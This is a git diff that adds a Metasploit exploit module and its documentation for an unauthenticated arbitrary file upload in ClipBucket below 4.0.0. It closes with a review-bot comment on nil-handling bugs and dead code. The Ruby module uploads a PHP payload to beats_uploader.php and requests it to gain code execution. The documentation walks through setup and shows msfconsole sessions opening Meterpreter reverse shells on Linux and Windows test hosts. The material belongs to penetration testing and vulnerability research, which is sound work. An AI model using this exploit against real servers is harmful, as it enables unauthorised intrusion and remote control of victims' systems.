diff --git a/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md b/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md
new file mode 100644
index 0000000000..95d4936360
--- /dev/null
+++ b/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md
@@ -0,0 +1,111 @@
+## Description
+A malicious file can be uploaded into the webserver by an unauthenticated attacker. It is possible for an attacker to upload
+a malicious script file to issue operating system commands.
+
+## Vulnerable Application
+According To publicly exploit Disclosure of ClipBucket < 4.0.0 - Release 4902
+this application is vulnerable to Unauthenticated Arbitrary File Upload
+read more : https://www.exploit-db.com/exploits/44250/
+
+**Vulnerable Application Link**
+https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip
+
+## Vulnerable Application Installation Setup.
+Download Application : ```wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip```
+
+Unzip : ```unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ```
+
+Move In WebDirectory : ```mv clipbucket-4881/upload/* /var/www/html/```
+
+Change Owner : ```chown -R www-data:www-data /var/www/html/```
+
+**And Follow Clipbucket Installer**
+Visit : http://localhost/
+
+
+## Verification Steps
+
+ 1. Install the application
+ 2. Start msfconsole
+ 3. Do: `use exploit/multi/http/clipbucket_fileupload_exec`
+ 4. Do: `set rport `
+ 5. Do: `set rhost `
+ 6. Do: `check`
+```
+[*] 10.22.1.4:80 The target appears to be vulnerable.
+```
+ 7. Do: `set lport `
+ 8. Do: `set lhost `
+ 9. Do: `exploit`
+ 10. You should get a shell.
+
+## Options
+
+ **TARGETURI**
+
+ TARGETURI by default is `/`, however it can be changed.
+
+## Scenarios
+**TESTED AGAINST LINUX**
+```
+msf > use exploit/multi/http/clipbucket_fileupload_exec
+msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4
+rhost => 10.22.1.4
+msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
+rport => 80
+msf exploit(multi/http/clipbucket_fileupload_exec) > set targeturi clipbucket
+targeturi => clipbucket
+msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
+lhost => 10.22.1.4
+msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 5050
+lport => 5050
+msf exploit(multi/http/clipbucket_fileupload_exec) > run
+
+[*] Started reverse TCP handler on 10.22.1.4:5050
+[*] Uploading payload..
+[+] Looking For Payload ....
+[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php
+[*] Executing Payload [ clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php ]
+[*] Sending stage (37543 bytes) to 10.22.1.4
+[*] Meterpreter session 1 opened (10.22.1.4:5050 -> 10.22.1.4:41752) at 2018-03-12 13:52:10 +0530
+[+] Deleted 1520842928949a3f.php
+
+meterpreter > sysinfo
+Computer : linux
+OS : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64
+Meterpreter : php/linux
+meterpreter >
+
+```
+
+**TESTED AGAINST WINDOWS**
+```
+msf > use exploit/multi/http/clipbucket_fileupload_exec
+msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13
+rhost => 10.22.1.13
+msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
+rport => 80
+msf exploit(multi/http/clipbucket_fileupload_exec) > set TARGETURI clipbucketest
+TARGETURI => clipbucketest
+msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
+lhost => 10.22.1.4
+msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 4545
+lport => 4545
+msf exploit(multi/http/clipbucket_fileupload_exec) > exploit
+
+[*] Started reverse TCP handler on 10.22.1.4:4545
+[*] Uploading payload..
+[+] Looking For Payload ....
+[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php
+[*] Executing Payload [ clipbucketest/actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php ]
+[*] Sending stage (37543 bytes) to 10.22.1.13
+[*] Meterpreter session 1 opened (10.22.1.4:4545 -> 10.22.1.13:49166) at 2018-03-12 14:11:10 +0530
+[+] Deleted 152084407045df09.php
+
+meterpreter > sysinfo
+Computer : AGENT22-PC
+OS : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
+Meterpreter : php/windows
+meterpreter >
+
+```
\ No newline at end of file
diff --git a/modules/exploits/multi/http/clipbucket_fileupload_exec.rb b/modules/exploits/multi/http/clipbucket_fileupload_exec.rb
new file mode 100644
index 0000000000..319387d1c1
--- /dev/null
+++ b/modules/exploits/multi/http/clipbucket_fileupload_exec.rb
@@ -0,0 +1,140 @@
+##
+# This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "ClipBucket Unauthenticated Arbitrary File Upload lower than 4.0.0 - Release 4902",
+ 'Description' => %q{
+ This module exploits a vulnerability found in ClipBucket version Lower than 4.0.0 - Release 4902.
+ A malicious file can be uploaded into the webserver using Unauthenticated Arbitrary File Upload attack.
+ It is possible for an attacker to upload a malicious script to issue operating system commands.
+ this issue caused by improper session handling in /action/beats uploader.php file. This module tested on ClipBucket [lt] 4.0.0 - Release 4902 in Windows7 and Kali Linux .
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'www.sec-consult.com', # Vulnerability Discovery, PoC
+ 'Touhid M.Shaikh ' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '44250' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'SSL' => false,
+ 'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+ 'Encoder' => 'php/base64'
+ },
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ ['Clipbucket < 4.0.0 - Release 4902', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Mar 03 2018",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
+ ])
+ end
+
+ def uri
+ return target_uri.path
+ end
+
+ def check
+ # Check version
+ peer = "#{rhost}:#{rport}"
+
+ vprint_status("Trying to detect ClipBucket on target.")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, "readme")
+ })
+
+ res2 = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, "actions", "beats_uploader.php")
+ })
+
+ if res and res.code == 200 and res.body =~ /ClipBucket/ and res2.code == 200
+ return Exploit::CheckCode::Appears
+ else
+ return Exploit::CheckCode::Unknown
+ end
+
+ vprint_status("Version NOT detected")
+
+ end
+
+ def exploit
+ peer = "#{rhost}:#{rport}"
+
+ # generate the PHP meterpreter payload
+ stager = ''
+
+ # Setting POST data
+ post_data = Rex::MIME::Message.new
+ post_data.add_part(stager, content_type = "application/octet-stream", transfer_encoding = nil, content_disposition = "form-data; name=\"file\"; filename=\"pfile.php\"") # payload
+ post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"plupload\"") # require for uploading
+ post_data.add_part('agent22.php', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"name\"")
+ data = post_data.to_s
+
+
+ print_status("Uploading payload..")
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(uri, "actions", "beats_uploader.php"),
+ 'data' => data,
+ 'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+ })
+
+ jsonres = res.get_json_document
+
+ # If the server returns 200 and success yes, we assume we uploaded the malicious
+ # file successfully
+ if not res or res.code != 200 or jsonres['success'] != 'yes'
+ fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
+ end
+ print_good("Looking For Payload .... ")
+ pdir = jsonres['file_directory']
+ file_name = jsonres['file_name']
+ pext = jsonres['extension']
+ print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext} ")
+
+ # Payload name
+ pname = file_name + ".php"
+
+ # Cleanup is Good Idea .
+ register_files_for_cleanup(pname)
+
+ print_status("Executing Payload [ #{uri}/actions/#{pdir}/#{pname} ]" )
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, "actions", pdir, pname)
+ })
+
+ # If we don't get a 200 when we request our malicious payload, we suspect
+ # we don't have a shell, either.
+ if res and res.code != 200
+ print_error("Unexpected response, probably the exploit failed")
+ end
+end
+
+end
+
+
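Review bot: In `exploit`, `jsonres = res.get_json_document` runs before the `if not res or res.code != 200 ...` guard, so a request that times out (nil `res`) raises NoMethodError and the `fail_with` branch is never reached. `check` has the same gap: `res2.code` is read without a nil test. Guard first with `fail_with(Failure::UnexpectedReply, "#{peer} - File wasn't uploaded, aborting!") unless res && res.code == 200`, parse the JSON after that, and then test `jsonres['success']`; in `check`, add `res2 &&` ahead of `res2.code == 200`. `Failure::None` also looks like the wrong category for a failed upload. Separately, `vprint_status("Version NOT detected")` in `check` can never run because both branches of the preceding `if/else` return, and the `# Check version` comment overstates what the method does, since it only looks for the string `ClipBucket` in the readme and a 200 from the uploader path.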